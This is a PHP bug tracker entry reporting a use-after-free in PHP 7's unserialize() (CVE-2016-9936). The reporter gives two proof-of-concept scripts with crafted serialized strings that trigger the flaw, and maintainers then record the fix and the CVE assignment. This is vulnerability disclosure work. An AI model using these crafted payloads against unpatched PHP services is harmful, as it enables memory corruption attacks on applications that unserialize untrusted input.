php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #72978 Use After Free in PHP7 unserialize()
Submitted: 2016-08-30 15:56 UTC Modified: 2016-12-13 11:52 UTC
From: taoguangchen at icloud dot com Assigned: stas (profile)
Status: Closed Package: *General Issues
PHP Version: 7.0.10 OS:
Private report: No CVE-ID: 2016-9936
 [2016-08-30 15:56 UTC] taoguangchen at icloud dot com
Description:
------------
PoC:
```
<?php

class obj1 implements Serializable {
    var $data;
    function serialize() {
        return serialize($this->data);
    }
    function unserialize($data) {
        $this->data = unserialize($data);
    }
}

class obj2 {
    var $ryat;
    function __wakeup() {
        $this->ryat = null;
    }
}

$inner = 's:4:"ryat";';
$exploit = 'a:2:{i:0;C:4:"obj1":'.strlen($inner).':{'.$inner.'}i:1;O:4:"obj2":1:{s:4:"ryat";R:3;}}';
$data = unserialize($exploit);
for ($i = 0; $i < 5; $i++) {
    $v[$i] = 'hi'.$i;
}
var_dump($data);

?>
```


Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2016-09-22 15:31 UTC] taoguangchen at icloud dot com
This bug can be triggered with CURLFile::__wakeup()

PoC:
```
<?php

class obj implements Serializable {
	var $data;
	function serialize() {
		return serialize($this->data);
	}
	function unserialize($data) {
		$this->data = unserialize($data);
	}
}

$inner = 's:4:"ryat";';
$exploit = 'a:2:{i:0;C:3:"obj":'.strlen($inner).':{'.$inner.'}i:1;O:8:"CURLFile":1:{s:4:"name";R:3;}}';
try {
	unserialize($exploit);
} catch (Exception $e) {
	var_dump($e->getMessage());
}
for ($i = 0; $i < 5; $i++) {
	$v[$i] = 'hi'.$i;
}

?>
```
 [2016-11-08 13:47 UTC] taoguangchen at icloud dot com
I think this issue has been fixed in master/7.0:

https://github.com/php/php-src/commit/b2af4e8868726a040234de113436c6e4f6372d17
 [2016-11-16 06:20 UTC] stas@php.net
-Status: Open +Status: Closed -Assigned To: +Assigned To: stas
 [2016-11-16 06:20 UTC] stas@php.net
The fix for this bug has been committed.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.

 For Windows:

http://windows.php.net/snapshots/
 
Thank you for the report, and for helping us make PHP better.

Closing accordingly.
 [2016-11-16 06:21 UTC] stas@php.net
-CVE-ID: +CVE-ID: needed
 [2016-11-16 06:21 UTC] stas@php.net
Looks like needing a CVE since triggering code is pretty common.
 [2016-12-12 09:37 UTC] kaplan@php.net
This issue isn't mentioned in 7.0.14 changelog.
 [2016-12-13 11:52 UTC] kaplan@php.net
-CVE-ID: needed +CVE-ID: 2016-9936
 [2016-12-13 11:52 UTC] kaplan@php.net
se CVE-2016-9936. The b2af4e8868726a040234de113436c6e4f6372d17 commit
message is "Complete the fix of bug #70172 for PHP 7." Because 70172
is referenced by CVE-2015-6834, it is possible to say that
CVE-2016-9936 exists because of an incomplete fix for CVE-2015-6834.
 
PHP Copyright © 2001-2017 The PHP Group
All rights reserved.
Last updated: Sun Nov 19 01:31:42 2017 UTC